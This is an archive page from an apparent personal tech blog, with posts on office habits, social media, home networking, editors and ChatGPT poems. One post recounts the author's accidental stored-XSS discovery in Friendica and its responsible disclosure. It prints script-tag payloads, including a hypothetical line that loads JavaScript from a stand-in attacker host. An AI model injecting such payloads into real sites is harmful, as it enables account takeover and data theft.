Honeypot.net

Jul 31, 2023 ∞

Simply Sabotaging an Office

The US Office of Strategic Services, the precursor of today’s CIA, wrote the Simple Sabotage Field Manual in 1944. Its goal was clear:

The purpose of this paper is to characterize simple sabotage, to outline its possible effects, and to present suggestions for inciting and executing it.

The target audience was people living in countries occupied by foreign armies, and it aimed to give them tools to surreptitiously fight back against the invaders. You should go read it now. Go ahead. It’s not long, and the manual’s packed with clever and fascinating ideas for gumming up an organization’s plans.

But as I read it, some of its suggestions sounded a lot like things I’ve seen at the office. This is a great analogy for technical debt:

(1) Let cutting tools grow dull. They will be inefficient, will slow down production, and may damage the materials and parts you use them on.

By section 11, “General Interference with Organizations and Production”, the analogies became concrete behaviors we’ve all seen:

(a) Organizations and Conferences
(1) Insist on doing everything through “channels.” Never permit short-cuts to be taken in order to expedite decisions.

“Channels” are there for a reason, and large organizations have to have certain formal processes in place so they don’t devolve into chaos. However, don’t let hidebound processes block progress. They’re supposed to make work possible, not completely block it.

(3) When possible, refer all matters to committees, for “further study and consideration.” Attempt to make the committees as large as possible–never less than five.

When an excited and competent colleague asks to improve something, and it’s not going to require the rest of the department to change their plans, find a way to let them. Nothing kills enthusiasm like scheduling a preliminary pre-meeting planning session a month later.

(6) Refer back to matters decided upon at the last meeting and attempt to re-open the question of the advisability of that decision.

Settled business should say settled. If new information has come to light, then that’s a new discussion. Once a group has reached a decision and started making plans on top of it, it’s too late to re-litigate old complaints.

(7) Advocate “caution.” Be “reasonable” and urge your fellow-conferees to be “reasonable” and avoid haste which might result in embarrassments or difficulties later on.

That sounds like excellent advice, doesn’t it? How insidious! Saying “no” incurs less personal risk than saying “yes”, but it stops all progress. Find a way to say “yes, but make sure to…” instead.

(b) Managers and Supervisors
(2) “Misunderstand” orders. Ask endless questions or engage in long correspondence about such orders. Quibble over them when you can.

No one enjoys having to explain all their ideas repeatedly. Sometimes it’s better to say “fine, go build it and show me”. Painting a picture is more fun than writing encyclopedic descriptions of what it will eventually look like. Trust smart people to do smart things.

(7) Insist on perfect work in relatively unimportant products; send back for refinishing those which have the least flaw. Approve other defective parts whose flaws are not visible to the naked eye.

Is there a meaningless typo in internal documentation? Did the author give something a name that’s accurate but not the one you would have chosen? Is their style different from your own, yet reasonable and understandable by their coworkers? Resist the urge to “improve” their work. Let it go. Save that political capital for when something’s objectively wrong.

(11) Hold conferences when there is more critical work to be done.

There’s nothing I can add here.

And for individual contributors:

(d) Employees
(5) Do your work poorly and blame it on bad tools, machinery, or equipment. Complain that these things are preventing you from doing your job right.

Granted, some tools are genuinely awful. If that’s the case, speak up and suggest good alternatives. Better, whip up a demonstration. Endless kvetching has never improved the situation.

(6) Never pass on your skill and experience to a new or less skillful worker.

Ineffective employees sometimes purposefully worm their way into critical business processes. What a miserable way to live! If you’re the only person who can do a certain important thing, you’ll never get to fully leave your job behind. Who wants to get called on vacation? Do yourself, your coworkers, and your company a favor: teach other people how to do your job. Make yourself valuable by excelling at it, but let other people help you carry the load.

None of the behaviors above are inherently malicious. Most can be explained by well-meaning people trying to do their jobs. That’s what makes them each so dangerous to an organization. A coworker who regularly schedules vague meetings to rehash old problems when you’re trying to get work done probably isn’t a deliberate saboteur. And yet, they’re following the CIA’s best advice on how to grind work to a halt.

Read the manual. Remember it. And when you see those behaviors pop up in your office, put a quick end to them.

Jul 1, 2023 ∞

Happy 25th birthday, honeypot.net!

In times of yore, my friends gave their computers cool cyberpunky names so that they sounded cool at LAN parties: “Hey, can you toss me an Ethernet cable for suntzu?” “Sure. Here’s the switch I’m using for chaosium.” My Amiga had a few hard drives to store all the, ahem, public domain music files that we traded around. I don’t know what prompted me to think of it as the honeypot full of music, but it stuck, and I christened it honeypot to be one of the cool kids.

I was working at an ISP and handling domain registration tasks for our customers. It struck me as a great idea to one-up my friends and turn my computer’s name into a full-blown domain name. The .org TLD didn’t feel right because I wasn’t an organization, and definitely didn’t identify with .org’s non-profit connotations. .com also felt wrong because I wasn’t some boring company that had decided to hop on to the Internet to see what the fuss was all about. .net had just the right about of geek cred, so honeypot.net it was.

It was the custom to have a cool and vaguely menacing desktop wallpaper to go with our cool and vaguely menacing handles. If you’ve seen “Hackers”, you’re familiar with those ideas. Here was my pre-honeypot.net background:

That wasn’t good enough to show off my new domain, so I replaced it:

Obligatory Nine Inch Nails-style backward n.

I needed to change things a bit when I acquired a second computer. Instead of using the whole domain name for a single host, I decided on a whim to give each one a name from A. A. Milne’s Winnie-the-Pooh stories. First, Pooh was my childhood stuffed animal best friend, and I still like him. Second, Pooh loves honey, as in a pot of it – a honeypot. Finally, it was an ironic pushback against the scary hacker imagery that was common at the time.

When I registered honeypot.net, about 2 million domains existed. Today there are about 700 million. I wish I’d gotten on the Bitcoin or Apple stock bandwagons that early.

Happy 25th birthday, honeypot.net. We’ve had fun.

Jun 30, 2023 ∞

Twitter went dark. Now what?

Twitter is in a race with Reddit to see who can ruin their service more quickly. That’s the simplest explanation I have for Twitter’s change today that hides all of their users’ posts behind a login page. Until today, you could still view a favorite company’s messages, or a sport team’s highlights, or an interesting author’s opinions, without logging on to the site. If you wanted to interact with that page by liking a post or replying to it, you needed an account. It was free to view those posts, though. And now, it’s not.

For end users, this immediately devalues Twitter as a way to casually catch up with public figures. For those public figures, this immediately devalues Twitter as a way to broadcast messages to the world. The service still has many users today, of course, and those people won’t go away immediately. But most recent public estimates say that Twitter has about 400 million users, or about 1/10th of the world’s online population. Assuming that all of those accounts are real people, which is a giant assumption, that means about 90% of the world can’t see those messages anymore.

A couple of pieces of free advice for people and organizations still posting to Twitter:

Investigate the alternatives that are open to readers by default. Facebook and friends also make it hard for casual visitors to see messages without logging in. Many brands have flocked to Mastodon, Micro.blog, and newer services like Bluesky.
Track your engagement numbers. If Twitter still reports a similar number of views for your messages after making them inaccessible to 90% of the world, those statistics are probably fake.
Blogs and newsletters still exist, and you have complete control over them. Consider communicating with your most loyal followers over open, easy-to-use channels that everyone can access.
And finally, start working on your Twitter exit strategy. As the site continues to remove the guardrails that kept it relatively civil and brand-safe, it’s only going to become a worse place to hang out.

Jun 28, 2023 ∞

Quitting Reddit

I’ve spent way more time on Reddit than I should have. I justified it to myself by saying it was a great way to stay current on news and technology trends. Really, it was just a slow drip of tiny endorphin hits that felt good but ultimately didn’t make my life better.

Thanks to Reddit CEO Steve Huffman’s ham-fisted community management and the resulting moderator and user boycott, I deleted its apps off my devices and stopped visiting the site altogether. The first couple of days were difficult, not in the overwhelming craving way that quitting smoking was hard, but because muscle memory kept trying to open the apps the moment I found myself with a few seconds to spare. That, too, passed.

Thanks, Reddit, for breaking my unhealthy addiction to your site. I couldn’t have done it without you.

Jun 20, 2023 ∞

Fake landlord tried to scam my kid

My kid and their friend are looking for a house to rent. They found a perfect match, with a nice house in a pretty neighborhood and accommodating landlords, but there were a few red flags.

The last was when the landlords wanted kid and friend to send them money, supposedly because they live in a different state, and then they’d mail the house keys. The landlord also sent the kids a signed lease to sign and return. The signature on that lease didn’t match up with their name:

I did a reverse image search on the signature, and it was L. Ron Hubbard’s signature from his Wikipedia article:

I took no joy in breaking the bad news to the kids, but I praised them profusely for talking to me about it first.

Jun 14, 2023 ∞

Language Server Protocol Launched a Golden Age of Editors

Microsoft developed Language Server Protocol (“LSP”) a few years ago to make it easier to add support for new languages to VS Code. Lots of smart people have written interesting things about LSP and I don’t want to rehash all that, but in summary: it gives people who like using a computer language a standard way to tell VS Code how to work with it.

Thing is, I don’t like VS Code at all. It’s a brilliant program, but under the covers it’s a web browser running a very clever JavaScript program. It doesn’t, and can’t, and won’t, ever feel like a native application, and that bothers me more than it should. I much prefer using what others call Mac-assed Mac apps. This is where LSP shows its real value.

Other apps can support LSP, too. Emacs users wrote a couple of different ways to connect those nifty new language servers to their favorite editor. Voila! Now Emacs has delightful support for every language that VS Code knows how to edit. So does Vim. And now, so do Nova and even the venerable BBEdit.

That last one blew me away. I’d seen it from a distance over the years. It’s impossible to use a Mac as a professional developer without at least being aware that it exists. BBEdit always struck me as a very neat, but very dated, niche editor that people kept using because they were too stubborn to switch. Oh, how wrong I was. I downloaded a copy a couple of weeks ago to kick the tires and found that since it can speak LSP, it might be the best programming environment I’ve ever used on my Mac. (“How’s its Python? Whoa! Is it that good with Rust? Whoa! How about… Terraform files? WHOA!”) 30 years of development as a text editor, plus all the effort that programming language users put into giving LSP broad and deep language support, yielded something that has incredible text mangling abilities and cutting-edge programming features. I love it. I’ve been trialing it as my main editor since then, and every day I appreciate it more.

I think we’re in a new golden age of programming editors. Now that any editor which can use LSP competes on a level playing field, the real competition is in subjective areas like the user interface, responsiveness, ergonomics, and extra functionality. Thanks to VS Code, those Mac-assed Mac apps redefine what developing software on a Mac can be like, and I couldn’t be more pleased with my options.

Jun 9, 2023 ∞

I use Things without encryption

Update 2023-11-03: No, I don’t.

I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:

Lacks end-to-end encryption

I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:

I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.

I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)

Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.

Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.

While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options makes it worthwhile for me to hold my nose and use it.

Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.

But I know I should still look for something more secure.

Jun 2, 2023 ∞

iA Presenter Public Launch

I’ve used iA Writer on Mac and iPad for years as my main writing environment. I’m typing this in it now. It’s strongly opinionated in the right ways: iA made a lot of design decisions on my behalf so that I’m not distracted by the temptation to fiddle with a thousand configuration knobs instead of, well, writing.

I leaped at the chance to try an early beta of their new iA Presenter app last year. It promised to make writing presentations as easy and pleasant as Writer made it to write words. In fact, their approaches are nearly identical. Both apps encourage you to write down your thoughts, and then they make them look pretty. Oh, how Presenter delivers on that promise! Rather than nudge me toward tweaking fonts, layout, page transitions, and all the other styling options you can possibly apply to a PowerPoint slide, it gives me an editor window where I write Markdown text. Then it renders that text as a series of beautifully styled, elegant slides. And with a couple of clicks, it can publish that presentation as a PDF that mixes slide content with narrator notes in a format that an audience can appreciate.

iA officially launched Presenter today and I bought my (one-time purchase! non-subscription!) license immediately. I’m grateful that I’m not regularly expected to talk to crowds. I’m also grateful that when I do, Presenter exists and saves me from the additional stress of trying to make my content look nice on a screen. It’s everything I love and appreciate about Writer’s approach to public writing, applied to public speaking. Congratulations, iA, and thanks!

May 30, 2023 ∞

Accidentally Hacking the Planet

Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

<script type="text/javascript">alert("I was here.");</script>

Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

<script>alert("Tek");</script>

Then I laughed about it with my geeky friends and promptly forgot all about the joke.

And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
The attack was simple: I changed my username to a bit of valid JavaScript.
All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
My little joke was annoying but harmless. A malicious attacker could just as easily change their username to

<script src="https://hackerz.ru/badstuff.js">Hi</script>

The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.

That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.¹ Satisfied that the right people had been notified, I went back to bed.

The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”²

My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>

It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.

Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎
Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎

May 18, 2023 ∞

Favorite apps: PastePal

I used to think the Copied clipboard manager for Apple devices was spiffy. I don’t know how or why, but that app disappeared from the Internet and the App Stores.

PastePal seems to be its spiritual successor. It works perfectly, it syncs across devices, and the pro version is a one-time, reasonable $15 purchase. It’s the only clipboard manager I’ve found that checks all those boxes.

May 16, 2023 ∞

Pianos.

I worked as a software developer with a strongly opinionated manager. He believed that we’d achieve Peak Programmer Productivity™️ by standardizing on one common desktop setup. Of course, that meant we’d all be writing Python code in Eclipse or some other similar abomination that he liked that month. This is for him.

From now on, we’ll all play the piano. This nonsense of everyone knowing a different instrument is costing us time and money. I’ve played the piano for years, and I know you’re going to like it.

Yes, you too, violinists. Vibrato? In my time as a pianist, I’ve never needed it.

Drums? A piano is a percussion instrument. How many kinds of percussion do we need? What’s that? No, they’re not that different. Tempo, rhythms, yes, yes, we’ll still have all that.

Huh, woodwinds. Good point. Well, there are more percussion and string players than woodwind…ists, so they can figure something out.

OK, we’re getting sidetracked here. Look, this is going to be good for you, too! There are more pianos than violins – yes, and clarinets… what’s that? Yes, and probably trumpets, too. Anyway, there are a lot of pianos. The next place you go will probably have a piano, so you’ll have a leg up if you ever leave here. Not that you would, am I right? But see, I’m only thinking of your careers.

Yes, I know we’re picking my favorite instrument. That’s a coincidence. I’ve looked into lots of instruments, but we can all agree that pianos have certain advantages that… Who threw that? Indoor voices, please! Anyway, I’ve looked into lots of instruments… no, I haven’t ever played a flute, but you’ll find that… no, I will not be shoving a piano there, thank you very much!

Alright, meeting’s over. Pianos. That’s what we’re all using, starting — hey, I don’t appreciate that language. Let’s all act like professional adults here.

Pianos.

May 13, 2023 ∞

eero + Firewalla = perfection

I built our home Wi-Fi network on eero Pro 6 mesh routers. It’s great. I love it. It works as advertised. If your household is like most others, where no one has specific highly technical needs, stop reading this and buy an eero system. I’ve recommended them to my friends and family with lots of happy feedback.

However, our needs are specific and highly technical. Making and fixing computer networks is a significant chunk of my job. Information security is another huge chunk of it. We host servers in our house. And soon, our ISP¹ will upgrade our Internet connection from 1Gbps to 10Gbps. eero has a few issues that complicate these uses:

A persistent DHCP bug gives out the gateway eero’s own IP as a DNS server (where it acts as a proxy), even if I configure custom DNS servers. This means that when I had a Pi-hole, most requests appeared to come from the eero itself and not the individual devices. Forget applying custom blocking policies to specific devices because there’s no way to distinguish them.
Hairpin NAT regularly breaks. If a device uses DNS to connect to a machine behind the eero gateway, say with Plex on an iPad configured to watch videos stored on a home server, it often works when I bring that device home and connect it to the same Wi-Fi as that server. For a while, at least. And then it won’t until I remembered to reboot the whole network.
The eero Pro 6 unit only has gigabit Ethernet jacks. If your Internet connection is faster than that, too bad. The newer eero Pro 6E units have single 2.5Gbps Ethernet jacks, which is almost worse. Although the gateway eero itself can have a 2.5Gbps Internet connection, it can’t share the full speed of that connection with any other device.
Its firewall settings are limited. I can either allow all remote hosts to connect to a specific port on an internal server, or not allow any hosts. I can’t define rules like “allow connections to port 8080 from host A.B.C.D”, or “block connections from North Korea”. In practice, this means I have to set the eero to allow all traffic, then configure another firewall app on my server to enforce more tailored rules.

Enter the Firewalla Gold Plus. It’s a freestanding firewall device with 4 2.5Gbps Ethernet jacks, and a phone (and web!) user interface that is as easy to use as eero’s. I’ve plugged the Firewalla directly into our Internet connection, and the eero gateway plugs into the Firewalla. I put the eero network into bridge mode so it only has to handle the Wi-Fi mesh network. The Firewalla assumed all routing and firewall duties. The setup works perfectly:

Firewalla’s DHCP is more configurable and works correctly. Its DNS incorporates a lot of Pi-hole’s functions like ad blocking and local DNS.
Hairpin NAT works perfectly, or at least it hasn’t broken yet in the few weeks since we got the device. I can connect to myserver.example.com from my living room as easily as from Starbucks without reconfiguring anything when I travel between those networks.
I don’t have the equipment to test Firewalla’s highest throughput yet. The box could max out at 1.1Gbps for all I could prove today. However, I doubt it. I can run benchmarks that pass 1Gbps of traffic in through 1 port and out through another without effort. Even if the Firewalla could only pass exactly 2.500Gbps through to the Internet connection, that would allow devices connected to the eero gateway to download at its current full 1Gbps speed while the new, separate wired LAN is also pulling another 1.5Gbps through it. For future improvement, it can bond pairs of Ethernet ports together to act as 5Gbps ports. That’s not the top speed of the 10Gbps Internet connection, but it’s faster than any devices I own today.
The firewall settings are vastly more sophisticated. I can open inbound ports to specific IPs or subnets, named groups of hosts, or geographical regions. I can also block outbound connections. And unlike with eero, I get a detailed report of blocked and allowed connections.

If I didn’t host a home server, or if I weren’t quite so super-nitpicky about security settings, or if our brilliant ISP wasn’t upgrading our connection from “hella fast” to “that’s just ridiculous”, our eero network would be fine as-is. I still happily recommend it to everyone I know. And despite my few complaints, I didn’t need to add a Firewalla to our working system. That said, I’m happy I did. It elevated our already excellent little network to blissfulness.

If you live somewhere with Sonic Internet access, get it. Their service is fast, inexpensive, reliable, doesn’t have data caps, and supports net neutrality. ↩︎

May 5, 2023 ∞

Wake up, little sunshine

I prompted ChatGPT with: “Write a song I can sing to my son to get him awake and moving to get ready for school.”

It replied with:

Verse 1
Wake up, little sunshine
There’s a new day dawning
You’ve got a big adventure
It’s time to get moving

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Verse 2
Stretch out your arms and legs
Take a deep breath and smile
You’ll make new friends today
And learn so much in a while

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Bridge
The world is waiting for you
To see all that you can do
So let’s start this day together
And make it great, no matter the weather

Chorus
Rise and shine, let’s go to school
Time to learn, time to grow
Put on your shoes, grab your bag
You’re ready to go

Outro
Wake up, little sunshine
It’s time to start your day
With a bright new adventure
You’ll find your own way.

Said son, who is 15, seemed to appreciate me waking him up by belting this out in full operatic tenor. I’m almost sure of it, despite any shouting to the contrary.

Apr 28, 2023 ∞

The Internet is a rough neighborhood

This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

A screenshot of blocked inbound connection attempts, originating from all over the world.

Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.

“I run my service on a custom port!” Doesn’t matter.

“I use IPv6!” Doesn’t matter.

“I’m just a nobody!” Doesn’t matter.

Practice safer networking, every time, all the time.

Apr 24, 2023 ∞

Fox News fired Tucker Carlson

However it’s spun, Fox News fired Tucker Carlson. Carlson had the most popular cable news show by a wide margin, and it’s inconceivable that Fox would simply “part ways” with their highest earner, with zero notice, without cause.

Hint: it’s never good to cost your employer a billion dollars — not that Carlson is the only miscreant at Fox.

Apr 18, 2023 ∞

Integrate Things with Focus

I use the Things task manager to keep track of what I need to do. I use the Focus pomodoro timer to help myself focus on a task that I’m actively working on.

Focus integrates well with another task manager, OmniFocus: you can drag an action from OmniFocus into Focus to create a task to work on, and that task will have a button that links back to the original OmniFocus action. Super convenient! It doesn’t play well with Things, though. If you try the same process, you’ll end up with multiple separate actions for each of the Things to-do’s various properties.

For example, this to-do has the title, note, checklist, tags, when, and deadline options filled in:

Dragging it to Focus creates a whole mess of random tasks:

That’s not helpful. We can do better.

First, I wrote a shortcut using Things’s shiny new Shortcuts actions. For each to-do currently selected in Things, it uses Focus’s URL scheme to create a Focus task with the item’s title, notes, and due date, and a link back to the item in Things.

Second, I made a Keyboard Maestro hot key macro, available only in Things, that executes my shortcut. When I select the to-do item above and press “option-F”, I get one single task with all the details set:

If I click the link icon next to the task’s title, Things opens with that to-do selected.

Ta-da! The workflow is slightly different than with OmniFocus, but only a little bit, and the result is just as useful.

Mar 23, 2023 ∞

Apple won't totally block unwanted emails

Apple’s email apps and services don’t allow users to completely block senders. If someone is sending you messages you don’t want to receive, tough. You’re going to get them.

The iCloud.com website’s Mail app doesn’t have a sender block mechanism. Instead, it offers a way to create rules based on each message’s attributes, such as its sender. Rules support these actions:

Move to Folder
Move to Trash
Forward to
Mark as Read
Move to Folder and Mark as Read
Move to Trash and Mark as Read
Forward to an Email Address and Mark as Read

None of those actions are the same as bouncing or silently discarding an email. At most, you can have the email sent to your Trash folder.

Mail.app on a Mac allows you to mark senders as “blocked”. You can configure Mail.app’s junk mail filters to either “Mark [their message] as blocked mail, but leave it in my Inbox” or “Move it to the Trash”. Again, you can’t bounce or discard it.

I tried to be clever and write an AppleScript program to delete messages from my Mac’s Trash folder. That was a dead end because AppleScript’s idea of deleting an email is moving it to Trash, even if it’s already in there. Neither does it offer a way to automatically empty the trash.

Apple, this is disappointing. If I’m blocking someone, I don’t want to hear from them at all, ever. It’s not enough to send their messages to the Trash folder. I don’t want them to be in my email account at all.

Mar 20, 2023 ∞

Upgrade your Raspberry Pi with an SSD

I upgraded my Raspberry Pi to use an external SSD drive instead of its built-in SD card reader. If you use your little computer for anything non-trivial, so should you.

For boring old dd sequential reads, the SSD is several times faster than the SD card:

A Boston Terrier Married a Cat

I prompted ChatGPT: “Write a Shakespearean sonnet about a Boston terrier marrying a cat.”

It replied:

“Oh, wondrous sight! A terrier and cat
In love, declaring bonds that none can break
Though some may scoff, and others may bark flat
Their love is true, not just a mere mistake

The terrier, bold and loyal as can be
Protects his feline bride with all his might
And she, with purrs and nuzzles, shows with glee
That this odd couple won’t give up the fight

They nap together, groom each other’s fur
And playfully chase one another around
To some, their pairing might seem quite absurd
But their love for each other knows no bound

So let them wed, and let their love be strong
For true love, no matter who, can’t be wrong”

Our inevitable robot overlords can write delightful poetry. We’re in trouble.

Feb 24, 2023 ∞

Easily copy file contents with ForkLift

I use the ForkLift 3 file manager on my Mac. Part of my job involves copying-and-pasting the contents of various files into web forms. I made a trivial little shell script so ForkLift can help me:

#!/bin/sh

if [ ${#@} -ne 1 ]; then
    echo "Expected exactly 1 filename."
    exit -1
fi   

pbcopy < $1

Then I created a new “Tool” called “Contents to Clipboard” that calls the script with the name of the selected file.

/Users/me/bin/copy_contents.sh $SOURCE_SELECTION_PATHS

Now I can select a file, select the Commands > Contents to Clipboard menu, and voila! The file’s contents are ready to be pasted into another app.